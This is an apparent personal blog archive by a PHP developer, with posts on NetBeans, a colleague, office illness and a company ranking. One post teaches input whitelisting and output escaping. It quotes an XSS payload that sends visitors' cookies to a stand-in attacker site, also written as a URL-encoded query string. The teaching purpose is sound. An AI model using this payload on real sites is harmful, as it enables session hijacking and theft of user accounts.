Jun 4 2009
I’ve started giving Netbeans for PHP a try, considering everyone is saying how much better it is than Eclipse PDT. So far I’m very impressed at it’s simplicity and ease of use – which for the main tool a programmer uses day in an day out for at least 8 hours, is a very good thing.
However I came across a couple of “issues” or teething problems rather, that thankfully with a short Google (sorry Bing…), I managed to find solutions for…
Mar 24 2009
Many people across the world have made this pledge:
I will publish a blog post on Tuesday 24th March about a woman in technology whom I admire but only if 1,000 other people will do the same.
Here is mine, and although I didn’t have to think very hard about who to post about, I still admire her more than anyone in the world.
Hannah is 39 weeks and 1 day pregnant today, and she’s still working hard at Netbasic. She’s not exactly a pro programmer, but she’s learning so quickly. From knowing nothing at all about HTML or CSS or Photoshop, she’s come forwards in leaps and bounds with the help of everyone here. It’s certainly not easy for her, she gets aches and pains all day, Braxton Hicks contractions, extremely painful kicks, and all sorts. She’s under the weather, tired and very drained, yet somehow she is carrying on, she’s still working hard and creating pages that are helping keep the company going!
I suppose this is just my way of saying how proud I am of her, and how awesome she is.
Jan 29 2009
I’m currently working on cleaning up the sanitisation and validation libraries in our homegrown framework at Netbasic here, and I was given an excerpt from the Php|architect’s Zend PHP 5 Certification Study Guide
Filtering input is important, and it is recommended to do this using a “white list” approach – i.e. you specify a valid choice of values for a particular field – if it does not match then discard it. Consider this:
// Example 1 $value = $_GET["colour"]; echo "Your favourite colour is {$value}";
This first example shows lack of filtering. Potentially, as the study guide shows, the colour could be overridden and set to be:
<script> document.location = 'http://myhackingsite.com/getcookies.php?cookies=' + document.cookie; </script>
This small piece of Javascript would then pick up people’s cookies. Lets look at the second example…
// Example 2 $value = "white"; $valid_colours = array("red","green","blue"); if(in_array($_GET["colour"], $valid_colours)) { $value = $_GET["colour"]; } echo "Your favourite colour is {$value}";
This piece of code is much safer (although not totally secure…). $value has been initialised. Although I ensure register_globals = Off where possible, there may be some hosts that have register_globals On. The “colour” $_GET value is checked against a white list, and if it does not match, it is not assigned. If $value is not initialised and register_globals was On, then someone could pass a query such as:
http://mywebsite.com/example.php?colour=notacolour&value=%3Cscript%3Edocument. location+%3D+%27http%3A%2F%2Fmyhackingsite.com%2Fgetcookies.php%3Fcookies%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E
What would happen is that the “colour” argument would not match the white list, but value would be initialised with the above piece of cookie-collecting Javascript. An even safer version of this code is with escaped output:
// Example 3 $value = "white"; $valid_colours = array("red","green","blue"); if(in_array($_GET["colour"], $valid_colours)) { $value = $_GET["colour"]; } $value = htmlentities($value); echo "Your favourite colour is {$value}";
Even with register_globals On and $value uninitialised, the end user will just see the Javascript directly, rather than the browser parsing it.
Don’t forget, output isn’t limited to just outputting to the browser through echo or print – you need to think about storing data, such as in MySQL databases or in files. Thankfully, PHP provides database-specific escaping functions, such as mysql_real_escape_string.
There’s much more to this than just what I’ve explained, and the study guide goes into a bit more depth. I recommend you pick up a copy
Oct 6 2008
Well its Monday morning again, I’m back at work, and Chris has given me some kind of lung death throat destroying illness. I’ve sorted through the barrage of spam e-mail and general rubbish that arrives in my Inbox over the weekend, revealing that there are actually no e-mails worth reading.
I’m not the only one who is ill though, Chris was the originator, and he’s passed it onto Sii, Jon and myself. In turn I’ve passed it onto Hannah, and its likely Jon has passed it onto Jake has he had a lift this morning. What makes this worse, in a matter of minutes, we’ll all be going into our weekly meeting and spreading the lung death throat destroying illness even further.
Sep 29 2008
This morning the office here at Netbasic was greeted with the good news that we made it to position 3 in The Sunday Times Microsoft Tech Track 100 for 2008.
The Tech Track 100 is published annually and ranks Britain’s fasting growing private tech companies over the last three years. Netbasic started in 2003 and in 2004, the company made £255,000 in sales, which soared 235% to £9.6 million in 2007.
This huge increase makes Netbasic rank at number 3, just below Lovefilm International, which in my eyes is a damn good feat!
Powered by WordPress
This website, all contents herein unless otherwise stated and the theme by James Titcumb
is licensed under a Creative Commons License.
Based on a work at www.asgrim.com.
RSS Feed icon by Jay Hilgert under a seperate license - see link for details.
On new server!
